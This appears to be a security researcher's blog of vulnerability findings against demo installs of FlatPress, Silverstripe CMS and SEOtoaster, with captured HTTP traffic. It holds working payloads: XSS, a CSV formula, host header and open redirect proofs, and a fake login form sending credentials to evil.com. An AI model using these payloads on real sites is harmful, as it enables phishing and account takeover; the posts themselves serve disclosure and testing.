Sunday, 21 September 2025

Friday Fun Pentest Series - 42 - Current Password not Required when Changing Password - flatpressv1.4.1

Description

- It was noted that the application did not require the current password for the password change functionality


Current Password not Required when Changing Password #1:

Steps to Reproduce:

  1. Login with admin user and visit "Main" > "Configuration" > "General Settings"
  2. Current password would not be required when changing the password

// HTTP POST Request

POST /FlatPressc4hak4mvef/admin.php?p=config&action=default HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_wpnonce=c1d6797fb9&_wp_http_referer=%2FFlatPressc4hak4mvef%2Fadmin.php%3Fp%3Dconfig&admin=admin&password=&confirm_password=&title=FlatPress&subtitle=My+FlatPress+blog&blogfooter=&author=test&www=http%3A%2F%2Fdemos5.softaculous.com%2FFlatPressc4hak4mvef%2F&email=demos%40softaculous.com&notify=on&startpage=%3ANULL%3A&maxentries=5&timeoffset=0&dateformat=%25A%2C+%25B+%25e%2C+%25Y&dateformatshort=%25Y-%25m-%25d&timeformat=%25H%3A%25M%3A%25S&lang=en-us&charset=utf-8&save=Save+Changes


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 15:14:16 GMT
Server: FlatPress
[...]



Friday Fun Pentest Series - 41 - Stored HTML Injection - flatpressv1.4.1

Description

- It was noted that the application was vulnerable to Stored HTML Injection in the "Write Entry" functionality


Stored HTML Injection #1:

Steps to Reproduce:

- Login with admin user and visit "Main" > "New Entry" > "Write Entry" and in the description enter the payload below

[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]


// HTTP POST Request

POST /FlatPressns3ufyfxkj/admin.php?p=entry&action=write HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_wpnonce=ee76fd6c94&_wp_http_referer=/FlatPressns3ufyfxkj/admin.php?p=entry&action=write&date_hour=16&date_minute=12&date_second=51&date_month=09&date_day=21&date_year=2025&subject=HTMLi&timestamp=1758471158&entry=&attachselect=-- Selection --&imageselect=-- Selection --&content=[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]&pl_file_meta=fp-content/content/seometa/default/metatags.ini&pl_description=&pl_keywords=&save=Publish


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 21 Sep 2025 16:12:55 GMT
Server: FlatPress
[...]


// HTTP GET Request

GET /FlatPressns3ufyfxkj/index.php/2025/09/21/htmli/ HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 16:12:58 GMT
Server: FlatPress
[...]

[...]
<div itemprop="articleBody"><p><div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal"><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div></p></div>
[...]





Saturday, 23 August 2025

Friday Fun Pentest Series - 40 - CSV Injection - silverstripecmsv6.0.0

Description

- It was noted that the application was vulnerable to CSV Injection in the "Users" functionality


CSV Injection #1:

Steps to Reproduce:
  1. Login and visit "Security" > "Add Member" > "First Name" and enter payload of =30*30
  2. Then visit "Reports" > "Users, Groups and Permissions" > "Export as CSV"
  3. Payload would render upon opening the CSV file


// HTTP POST Request

POST /admin/security/users/EditForm/field/users/item/new/ItemEditForm HTTP/1.1
Host: demo.silverstripe.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
[...]
FirstName=%3D30*30&Surname=test&Email=test%40example.com&Password%5B_Password%5D=&Password%5B_ConfirmPassword%5D=&Locale=en_US&FailedLoginCount=&SecurityID=8f151871365766eb90355f98c745a93ae8f5205c&action_doSave=1&BackURL=https%3A%2F%2Fdemo.silverstripe.org%2Fadmin%2Fsecurity


// HTTP Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 16 Aug 2025 17:02:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
x-status: Saved%20Member%20%22test%2C%20%3D30%2A30%22%20successfully.
x-controllerurl: admin/security/users/EditForm/field/users/item/510
x-pjax: CurrentForm,Breadcrumbs,ValidationResult
x-controller: SilverStripe\Admin\SecurityAdmin
x-title: Silverstripe+-+Security
x-frame-options: SAMEORIGIN
vary: X-Requested-With
[...]





Friday Fun Pentest Series - 39 - Host Header Injection - silverstripecmsv6.0.0

 Description

- It was noted that the application was vulnerable to Host Header Injection in the login page


Host Header Injection #1:

Steps to Reproduce:

  1. Login and change the Host header to Burp Collab domain
  2. Upon logging in the Collab would get a hit from the IP of the app

// HTTP Post Request

POST /Security/login/default/LoginForm HTTP/1.1
Host: 7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
[...]

AuthenticationMethod=SilverStripe%5CSecurity%5CMemberAuthenticator%5CMemberAuthenticator&Email=admin&Password=password&SecurityID=5afbb1fab346375510939ba7b65499e556b0251c&action_doLogin=Log+in


// HTTP Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Cache-Control: no-cache, no-store
[...]

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=27&xinfo=1014-115438578-0%200NNN%20RT%281755353110306%2067%29%20q%280%20-1%20-1%20-1%29%20r%284%20-1%29&incident_id=0-468567604813498382&edet=22&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-468567604813498382</iframe></body></html>


// Burp Collab domain hit

The Collaborator server received a DNS lookup of type CNAME for the domain name www.7ksb89bppmbvc3po6ma6x72n7ed51wtki.oastify.com.  
The lookup was received from IP address 149.126.76.44:7396 at 2025-Aug-16 14:05:10.562 UTC.


Wednesday, 30 July 2025

Friday Fun Pentest Series - 38 - Lack of Password Change Functionality - seotoasterv2.5.0

Description

- It was noted that the application lacked password change functionality


Lack of Password Change Functionality #1

Steps to Reproduce:
  1. Login with low privilege user and see that there is no password change functionality

// HTTP POST Request

POST /seotoaster/go HTTP/1.1
Host: 192.168.58.149
Content-Length: 108
Cache-Control: max-age=0
Accept-Language: en-GB,en;q=0.9
Origin: http://192.168.58.149
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
[...]

email=test2%40example.com&password=Passw0rd%21&submit=Let+me+in&secureToken=477a9f50c8616d5ee4cabf2038fc43a3


// HTTP Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Jul 2025 14:44:11 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]



Friday Fun Pentest Series - 37 - Open Redirect "Login Page" Functionality - seotoasterv2.5.0

Description

- It was noted that the application was vulnerable to Open Redirect in the "Login Page"


Open Redirect "Login Page" Functionality 1#

Steps to Reproduce:
  1. Login to the application and then add the Referer header to attacker domain

// HTTP POST Request

POST /seotoaster/go HTTP/1.1
Host: 192.168.58.149
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]

email=admin%40example.com&password=Pasw0rd%21&submit=Let+me+in&secureToken=f3a4d32c75942f7f284ae9189e21d431



// HTTP Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Jul 2025 13:55:07 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://lzoujc24ovcp1k9ky066bcmas1ysmuaj.oastify.com
[...]

Friday Fun Pentest Series - 36 - Stored XSS "Edit General Info" Functionality - seotoasterv2.5.0

 Description

- It was noted that the application was vulnerable to Cross-Site Scripting (XSS) in the "Edit General Info"


Stored XSS "Edit General Info"#1

Steps to Reproduce

  1. Login with admin and visit "Website ID Card" > "Website Id Card"
  2. In the "Organization Name" add the following payload "><img src=x onerror=alert(1)>

// HTTP POST Request

POST /seotoaster/plugin/widcard/run/setWebsiteIdCard HTTP/1.1
Host: 192.168.58.149
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]

------geckoformboundarye25c980b11fd10ddbadfbd1b54af4d87
Content-Disposition: form-data; name="organization_name"

"><img src=x onerror=alert(`xss1`)>
------geckoformboundarye25c980b11fd10ddbadfbd1b54af4d87
Content-Disposition: form-data; name="organization_description"

"><img src=x onerror=alert(`xss2`)>
------geckoformboundarye25c980b11fd10ddbadfbd1b54af4d87
[...]


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 20 Jul 2025 15:35:07 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]


// HTTP GET Request

GET /seotoaster/plugin/widcard/run/getWebsiteIdCard HTTP/1.1
Host: 192.168.58.149
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 20 Jul 2025 15:35:11 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]

[...]
<input type="text" name="organization_name" value=""><img src=x onerror=alert(`xss1`)>" />
[...]

Friday Fun Pentest Series - 42 - Current Password not Required when Changing Password - flatpressv1.4.1

Description - It was noted that the application did not require the current password for the password change functionality Current Password ...